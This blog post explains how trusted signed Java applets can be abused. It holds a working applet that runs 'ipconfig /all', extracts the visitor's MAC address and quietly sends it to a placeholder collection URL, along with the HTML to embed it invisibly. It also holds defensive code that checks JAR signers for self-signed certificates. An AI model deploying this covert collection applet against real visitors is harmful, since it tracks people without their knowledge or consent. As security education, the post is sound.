Trusting Java Applets

Abusing the trust people have in signed applets.

It’s been blogged before, but oh well, I always learn by example, so here is an example. The thing I’m talking about is trusting signed Java applets. In short, when you trust a Java applet it can do whatever it wants. So what could you do with a Java applet? The Java source code below will steal your MAC address, rather useless, but it serves the example purpose well enough. The stolen MAC address gets submitted to a page, in this case Google, which will look like this:

So on the server side you can just match IP + MAC address and build yourself a (maybe) useless database. You could also write code which does more evil stuff instead of just stealing the MAC address.

Are you wondering how to sign a Java applet? Visit the following URL:

The HTML code to embed the applet in your page is as follows:

<TITLE>Get MacAddress Applet</TITLE>
Get MacAddress applet<BR>
<applet code="GetMacAddress.class" archive="GetMacAddress.jar" width=1 height=1>
    <!-- the applet reads BASEURL via getParameter(); the value here is a placeholder, not the original post's -->
    <param name="BASEURL" value="http://example.com/collect?mac=">
</applet>

So now for the example code of the “evil” applet.

import java.applet.Applet;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * This applet gets the mac address from a windows machine
 * @author DiabloHorn
 */
public class GetMacAddress extends Applet {

    /** Creates a new instance of GetMacAddress */
    public void init() {
        try {
            String macAddress = this.getMacAddress();
            // BASEURL comes from the <param> tag in the embedding page; the MAC is appended to it
            URL url = new URL(this.getParameter("BASEURL") + macAddress);
            getAppletContext().showDocument(url, "_self");
        } catch (Exception e) {
            // nothing is shown to the user if the lookup or the redirect fails
        }
    }

    public String getMacAddress() throws IOException {
        String macAddress = null;
        String command = "ipconfig /all"; // Windows only
        // spawning a process is only possible because the signed applet was granted full trust
        Process pid = Runtime.getRuntime().exec(command);
        BufferedReader in = new BufferedReader(new InputStreamReader(pid.getInputStream()));
        // group 1 is a MAC address written as six hex pairs separated by '-' or ':'
        Pattern p = Pattern.compile(".*((?:[0-9a-f]{2}[-:]){5}[0-9a-f]{2}).*", Pattern.CASE_INSENSITIVE);
        while (true) {
            String line = in.readLine();
            if (line == null) {
                break;
            }
            Matcher m = p.matcher(line);
            if (m.matches()) {
                macAddress = m.group(1);
            }
        }
        in.close();
        return macAddress;
    }
}
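The whole decision to trust rests on the signature, so the one thing worth checking before clicking Trust is who actually signed the JAR. The following is an added example and not code from the original post: it opens GetMacAddress.jar (or any JAR given on the command line), verifies the entry digests while reading, and prints the signer of every class, flagging self-signed certificates, which anyone can produce with keytool and which say nothing about the publisher.

```java
import java.io.IOException;
import java.io.InputStream;
import java.security.CodeSigner;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Enumeration;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;

/** Reports who signed each class in an applet JAR such as GetMacAddress.jar (example code, not the post's). */
public class JarSignerCheck {
    public static void main(String[] args) throws IOException {
        // verify=true: reading an entry whose digest or signature does not check out throws SecurityException
        try (JarFile jar = new JarFile(args[0], true)) {
            Enumeration<JarEntry> entries = jar.entries();
            while (entries.hasMoreElements()) {
                JarEntry entry = entries.nextElement();
                if (entry.isDirectory() || entry.getName().startsWith("META-INF/")) continue;
                // code signers are only attached once the entry has been read to the end
                try (InputStream in = jar.getInputStream(entry)) {
                    byte[] buf = new byte[8192];
                    while (in.read(buf) != -1) { }
                }
                CodeSigner[] signers = entry.getCodeSigners();
                if (signers == null) {
                    System.out.println("UNSIGNED  " + entry.getName());
                    continue;
                }
                for (CodeSigner signer : signers) {
                    // the first certificate in the path is the signer's own (leaf) certificate
                    X509Certificate leaf = (X509Certificate) signer.getSignerCertPath().getCertificates().get(0);
                    System.out.println("SIGNED    " + entry.getName() + " by " + describe(leaf));
                }
            }
        }
    }

    /** Subject and issuer, flagged when the certificate is self-signed or outside its validity period. */
    static String describe(X509Certificate cert) {
        String subject = cert.getSubjectX500Principal().getName();
        String issuer = cert.getIssuerX500Principal().getName();
        String flags = subject.equals(issuer) ? " [SELF-SIGNED]" : "";
        try {
            cert.checkValidity();
        } catch (CertificateException e) {
            flags += " [NOT VALID NOW]";
        }
        return subject + " (issuer: " + issuer + ")" + flags;
    }
}
```

Run it as `java JarSignerCheck GetMacAddress.jar`; a tampered entry aborts the run with a SecurityException instead of being listed.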

5 thoughts on “Trusting Java Applets”

  1. If you modify the command it might work yes, I haven’t had the time to test it out. My point was more about signed applets and the endless possibilities.

  2. Hi!
    As far as I know, “ipconfig /all” is for MS Windows. So do you think this applet will work on a client running Linux?

    Please answer me.

  3. Hi,

    Do you have Java/applet code that can get the real IP? Thanks…


